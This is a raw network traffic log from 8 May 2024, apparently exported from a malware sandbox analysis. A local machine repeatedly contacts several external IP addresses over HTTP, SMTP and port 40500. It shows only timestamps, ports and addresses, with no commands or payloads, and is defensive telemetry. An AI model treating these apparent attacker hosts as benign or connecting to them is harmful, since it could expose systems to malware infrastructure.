                                                                              May 8, 2024 15:22:53.829349041 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:53.829361916 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:53.829376936 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:53.829379082 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:53.829390049 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:53.829396963 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:53.829412937 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:53.829413891 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:53.829433918 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:53.829457998 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:53.829516888 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:53.829591990 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:53.829627991 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:53.829665899 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.169622898 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.169639111 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.169651985 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.169666052 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.169680119 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.169724941 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.169769049 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.169775009 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.169787884 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.169816971 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.169852018 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.529365063 CEST4971680192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.869045973 CEST8049716185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.869136095 CEST8049716185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.869206905 CEST8049716185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.869239092 CEST4971680192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.869271040 CEST4971680192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.869303942 CEST8049716185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.869362116 CEST8049716185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.869374037 CEST8049716185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.869386911 CEST8049716185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.869417906 CEST8049716185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.869431019 CEST8049716185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:54.869494915 CEST4971680192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.869494915 CEST4971680192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.869494915 CEST4971680192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.869494915 CEST4971680192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.870213985 CEST4971680192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:54.870281935 CEST4971680192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:55.872432947 CEST4971980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:56.215188026 CEST8049719185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:56.215296984 CEST4971980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:56.215485096 CEST4971980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:56.560861111 CEST8049719185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:56.561414957 CEST8049719185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:56.561429977 CEST8049719185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:56.561443090 CEST8049719185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:56.561477900 CEST4971980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:56.561491966 CEST8049719185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:56.561501026 CEST4971980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:56.561506987 CEST8049719185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:56.561547995 CEST4971980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:56.561968088 CEST8049719185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:56.561980963 CEST8049719185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:56.561992884 CEST8049719185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:22:56.562026024 CEST4971980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:56.562050104 CEST4971980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:22:59.823158026 CEST4972025192.168.2.867.195.228.94
                                                                              May 8, 2024 15:23:00.527477980 CEST4971880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:23:00.824408054 CEST4972025192.168.2.867.195.228.94
                                                                              May 8, 2024 15:23:00.867501020 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:00.867768049 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:00.867784977 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:00.867800951 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:00.867819071 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:00.867862940 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:00.867877960 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:00.867892981 CEST8049718185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:00.867907047 CEST8049718185.215.113.66192.168.2.8
May 8, 2024 15:23:00.868067026 CEST  49718    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:00.868067026 CEST  49718    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:00.868942022 CEST  49718    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:00.868966103 CEST  49718    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:00.996284962 CEST  49714    40500    192.168.2.8      93.117.37.145
May 8, 2024 15:23:01.872416019 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:02.215249062 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:02.215430975 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:02.218699932 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:02.561309099 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:02.561400890 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:02.561417103 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:02.561436892 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:02.561450958 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:02.561461926 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:02.561499119 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:02.561553001 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:02.561568022 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:02.561585903 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:02.561598063 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:02.561616898 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:02.561680079 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:02.561692953 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:02.561734915 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:02.561749935 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:02.840063095 CEST  49720    25       192.168.2.8      67.195.228.94
May 8, 2024 15:23:03.404200077 CEST  49719    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:03.747004986 CEST  80       49719    185.215.113.66   192.168.2.8
May 8, 2024 15:23:03.747179031 CEST  80       49719    185.215.113.66   192.168.2.8
May 8, 2024 15:23:03.747245073 CEST  80       49719    185.215.113.66   192.168.2.8
May 8, 2024 15:23:03.747246027 CEST  49719    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:03.747288942 CEST  49719    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:03.747311115 CEST  80       49719    185.215.113.66   192.168.2.8
May 8, 2024 15:23:03.747324944 CEST  80       49719    185.215.113.66   192.168.2.8
May 8, 2024 15:23:03.747350931 CEST  49719    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:03.747370958 CEST  49719    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:03.747488976 CEST  80       49719    185.215.113.66   192.168.2.8
May 8, 2024 15:23:03.747503996 CEST  80       49719    185.215.113.66   192.168.2.8
May 8, 2024 15:23:03.747530937 CEST  49719    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:03.747544050 CEST  49719    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:03.747601986 CEST  80       49719    185.215.113.66   192.168.2.8
May 8, 2024 15:23:03.747617960 CEST  80       49719    185.215.113.66   192.168.2.8
May 8, 2024 15:23:03.747638941 CEST  49719    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:03.747663021 CEST  49719    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:03.763438940 CEST  49719    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:03.763477087 CEST  49719    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:04.779449940 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:05.119329929 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:05.119474888 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:05.119743109 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:05.460005999 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:05.460170031 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:05.460231066 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:05.460290909 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:05.460333109 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:05.460333109 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:05.460334063 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:05.460385084 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:05.460400105 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:05.460412979 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:05.460444927 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:05.460444927 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:05.460448980 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:05.460464001 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:05.460467100 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:05.460505009 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:05.460505009 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:06.840105057 CEST  49720    25       192.168.2.8      67.195.228.94
May 8, 2024 15:23:07.870774984 CEST  49723    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.219271898 CEST  80       49723    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.219391108 CEST  49723    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.219573975 CEST  49723    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.563077927 CEST  80       49723    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.563103914 CEST  80       49723    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.563170910 CEST  49723    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.638293982 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.980875969 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.981136084 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.981209040 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.981245041 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.981240988 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.981327057 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.981327057 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.981338978 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.981383085 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.981404066 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.981430054 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.981455088 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.981470108 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.981472015 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.981492043 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.981508970 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.981517076 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.981523037 CEST  80       49721    185.215.113.66   192.168.2.8
May 8, 2024 15:23:08.981545925 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.981579065 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.982326984 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:08.982353926 CEST  49721    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:09.997476101 CEST  49724    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:10.340876102 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.340990067 CEST  49724    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:10.341459990 CEST  49724    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:10.685818911 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.685848951 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.685863018 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.685875893 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.685889006 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.685904980 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.685919046 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.685929060 CEST  49724    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:10.685935020 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.685946941 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.685960054 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.685971022 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:10.685973883 CEST  49724    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:10.685997009 CEST  49724    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:10.686013937 CEST  49724    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:10.798090935 CEST  49723    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:12.013029099 CEST  49725    40500    192.168.2.8      212.154.184.158
May 8, 2024 15:23:12.578171015 CEST  49726    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:12.927531004 CEST  80       49726    91.202.233.141   192.168.2.8
May 8, 2024 15:23:12.927687883 CEST  49726    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:12.927995920 CEST  49726    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:13.027527094 CEST  49725    40500    192.168.2.8      212.154.184.158
May 8, 2024 15:23:13.280188084 CEST  80       49726    91.202.233.141   192.168.2.8
May 8, 2024 15:23:13.280214071 CEST  80       49726    91.202.233.141   192.168.2.8
May 8, 2024 15:23:13.280307055 CEST  49726    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:14.840065002 CEST  49720    25       192.168.2.8      67.195.228.94
May 8, 2024 15:23:15.043190956 CEST  49725    40500    192.168.2.8      212.154.184.158
May 8, 2024 15:23:15.325579882 CEST  49726    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:15.675209045 CEST  80       49726    91.202.233.141   192.168.2.8
May 8, 2024 15:23:15.675389051 CEST  49726    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:18.033344030 CEST  49727    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:18.033548117 CEST  49726    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:18.379534006 CEST  80       49727    91.202.233.141   192.168.2.8
May 8, 2024 15:23:18.379623890 CEST  49727    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:18.379914999 CEST  49727    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:18.382745028 CEST  80       49726    91.202.233.141   192.168.2.8
May 8, 2024 15:23:18.382819891 CEST  49726    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:18.725816011 CEST  80       49727    91.202.233.141   192.168.2.8
May 8, 2024 15:23:18.725898027 CEST  80       49727    91.202.233.141   192.168.2.8
May 8, 2024 15:23:18.726074934 CEST  49727    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:19.043165922 CEST  49725    40500    192.168.2.8      212.154.184.158
May 8, 2024 15:23:20.747984886 CEST  49727    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:21.096507072 CEST  80       49727    91.202.233.141   192.168.2.8
May 8, 2024 15:23:21.096638918 CEST  49727    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:21.422130108 CEST  49728    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:21.774837971 CEST  80       49728    193.233.132.177  192.168.2.8
May 8, 2024 15:23:22.277574062 CEST  49728    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:22.630199909 CEST  80       49728    193.233.132.177  192.168.2.8
May 8, 2024 15:23:23.122517109 CEST  49727    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:23.122838974 CEST  49729    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:23.136910915 CEST  49728    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:23.468173981 CEST  80       49727    91.202.233.141   192.168.2.8
May 8, 2024 15:23:23.468302965 CEST  49727    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:23.477355003 CEST  80       49729    91.202.233.141   192.168.2.8
May 8, 2024 15:23:23.477463007 CEST  49729    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:23.477629900 CEST  49729    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:23.489429951 CEST  80       49728    193.233.132.177  192.168.2.8
May 8, 2024 15:23:23.831897020 CEST  80       49729    91.202.233.141   192.168.2.8
May 8, 2024 15:23:23.832170963 CEST  80       49729    91.202.233.141   192.168.2.8
May 8, 2024 15:23:23.832223892 CEST  49729    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:23.996314049 CEST  49728    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:24.351547956 CEST  80       49728    193.233.132.177  192.168.2.8
May 8, 2024 15:23:24.855665922 CEST  49728    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:25.209136009 CEST  80       49728    193.233.132.177  192.168.2.8
May 8, 2024 15:23:25.857956886 CEST  49729    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:25.858403921 CEST  49730    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:26.215388060 CEST  80       49729    91.202.233.141   192.168.2.8
May 8, 2024 15:23:26.215625048 CEST  49729    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:26.216273069 CEST  80       49730    91.202.233.141   192.168.2.8
May 8, 2024 15:23:26.216386080 CEST  49730    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:26.216587067 CEST  49730    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:26.571039915 CEST  80       49730    91.202.233.141   192.168.2.8
May 8, 2024 15:23:26.571116924 CEST  80       49730    91.202.233.141   192.168.2.8
May 8, 2024 15:23:26.571346045 CEST  49730    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:27.043319941 CEST  49725    40500    192.168.2.8      212.154.184.158
May 8, 2024 15:23:27.232469082 CEST  49731    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:27.587002039 CEST  80       49731    193.233.132.177  192.168.2.8
May 8, 2024 15:23:28.090101957 CEST  49731    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:28.442854881 CEST  80       49731    193.233.132.177  192.168.2.8
May 8, 2024 15:23:28.609245062 CEST  49730    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:28.609931946 CEST  49732    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:28.949414968 CEST  49731    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:28.959718943 CEST  80       49732    91.202.233.141   192.168.2.8
May 8, 2024 15:23:28.959837914 CEST  49732    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:28.960473061 CEST  49732    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:28.964862108 CEST  80       49730    91.202.233.141   192.168.2.8
May 8, 2024 15:23:28.964945078 CEST  49730    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:29.302330017 CEST  80       49731    193.233.132.177  192.168.2.8
May 8, 2024 15:23:29.308849096 CEST  80       49732    91.202.233.141   192.168.2.8
May 8, 2024 15:23:29.309212923 CEST  80       49732    91.202.233.141   192.168.2.8
May 8, 2024 15:23:29.309353113 CEST  49732    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:29.808756113 CEST  49731    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:30.161375999 CEST  80       49731    193.233.132.177  192.168.2.8
May 8, 2024 15:23:30.668165922 CEST  49731    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:31.021090984 CEST  80       49731    193.233.132.177  192.168.2.8
May 8, 2024 15:23:31.342622042 CEST  49732    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:31.342955112 CEST  49733    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:31.691466093 CEST  80       49732    91.202.233.141   192.168.2.8
May 8, 2024 15:23:31.691607952 CEST  49732    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:31.698472023 CEST  80       49733    91.202.233.141   192.168.2.8
May 8, 2024 15:23:31.698569059 CEST  49733    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:31.698714018 CEST  49733    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:32.053694010 CEST  80       49733    91.202.233.141   192.168.2.8
May 8, 2024 15:23:32.053797960 CEST  80       49733    91.202.233.141   192.168.2.8
May 8, 2024 15:23:32.053844929 CEST  49733    80       192.168.2.8      91.202.233.141
May 8, 2024 15:23:33.095837116 CEST  49734    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:33.453294039 CEST  80       49734    193.233.132.177  192.168.2.8
May 8, 2024 15:23:33.980818987 CEST  49734    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:34.333873987 CEST  80       49734    193.233.132.177  192.168.2.8
May 8, 2024 15:23:34.996319056 CEST  49734    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:35.350698948 CEST  80       49734    193.233.132.177  192.168.2.8
May 8, 2024 15:23:35.460180044 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:35.460546017 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:35.736548901 CEST  49735    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:35.980662107 CEST  49734    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:36.093008041 CEST  80       49735    193.233.132.177  192.168.2.8
May 8, 2024 15:23:36.333898067 CEST  80       49734    193.233.132.177  192.168.2.8
May 8, 2024 15:23:36.652591944 CEST  49735    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:36.996253967 CEST  49734    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:37.008189917 CEST  80       49735    193.233.132.177  192.168.2.8
May 8, 2024 15:23:37.349455118 CEST  80       49734    193.233.132.177  192.168.2.8
May 8, 2024 15:23:37.652555943 CEST  49735    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:38.009069920 CEST  80       49735    193.233.132.177  192.168.2.8
May 8, 2024 15:23:38.090823889 CEST  49736    40500    192.168.2.8      82.194.11.2
May 8, 2024 15:23:38.543210030 CEST  49735    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:38.896920919 CEST  80       49735    193.233.132.177  192.168.2.8
May 8, 2024 15:23:39.152582884 CEST  49736    40500    192.168.2.8      82.194.11.2
May 8, 2024 15:23:39.449420929 CEST  49735    80       192.168.2.8      193.233.132.177
May 8, 2024 15:23:39.803133965 CEST  80       49735    193.233.132.177  192.168.2.8
May 8, 2024 15:23:40.497894049 CEST  49722    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:40.498168945 CEST  49737    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:40.685079098 CEST  80       49724    185.215.113.66   192.168.2.8
May 8, 2024 15:23:40.685136080 CEST  49724    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:40.838583946 CEST  80       49722    185.215.113.66   192.168.2.8
May 8, 2024 15:23:40.838632107 CEST  80       49737    185.215.113.66   192.168.2.8
May 8, 2024 15:23:40.838799953 CEST  49737    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:40.838985920 CEST  49737    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:41.168258905 CEST  49736    40500    192.168.2.8      82.194.11.2
May 8, 2024 15:23:41.180859089 CEST  80       49737    185.215.113.66   192.168.2.8
May 8, 2024 15:23:41.181057930 CEST  80       49737    185.215.113.66   192.168.2.8
May 8, 2024 15:23:41.181135893 CEST  80       49737    185.215.113.66   192.168.2.8
May 8, 2024 15:23:41.181152105 CEST  80       49737    185.215.113.66   192.168.2.8
May 8, 2024 15:23:41.181184053 CEST  49737    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:41.181247950 CEST  49737    80       192.168.2.8      185.215.113.66
May 8, 2024 15:23:41.181360006 CEST  80       49737    185.215.113.66   192.168.2.8
                                                                              May 8, 2024 15:23:41.181449890 CEST8049737185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:41.181508064 CEST8049737185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:41.181509972 CEST4973780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:23:41.181555033 CEST8049737185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:41.181561947 CEST4973780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:23:41.181571007 CEST8049737185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:41.181648970 CEST4973780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:23:41.183413982 CEST4973780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:23:41.183480024 CEST4973780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:23:41.523413897 CEST8049737185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:41.523695946 CEST4973780192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:23:41.779947996 CEST4973880192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:23:42.133910894 CEST8049738193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:23:42.636931896 CEST4973880192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:23:42.990695953 CEST8049738193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:23:43.217231989 CEST4973980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:23:43.496272087 CEST4973880192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:23:43.555993080 CEST8049739185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:43.558660030 CEST4973980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:23:43.559075117 CEST4973980192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:23:43.849900007 CEST8049738193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:23:43.898813963 CEST8049739185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:43.898837090 CEST8049739185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:43.898852110 CEST8049739185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:43.898871899 CEST8049739185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:23:43.898885012 CEST8049739185.215.113.66192.168.2.8
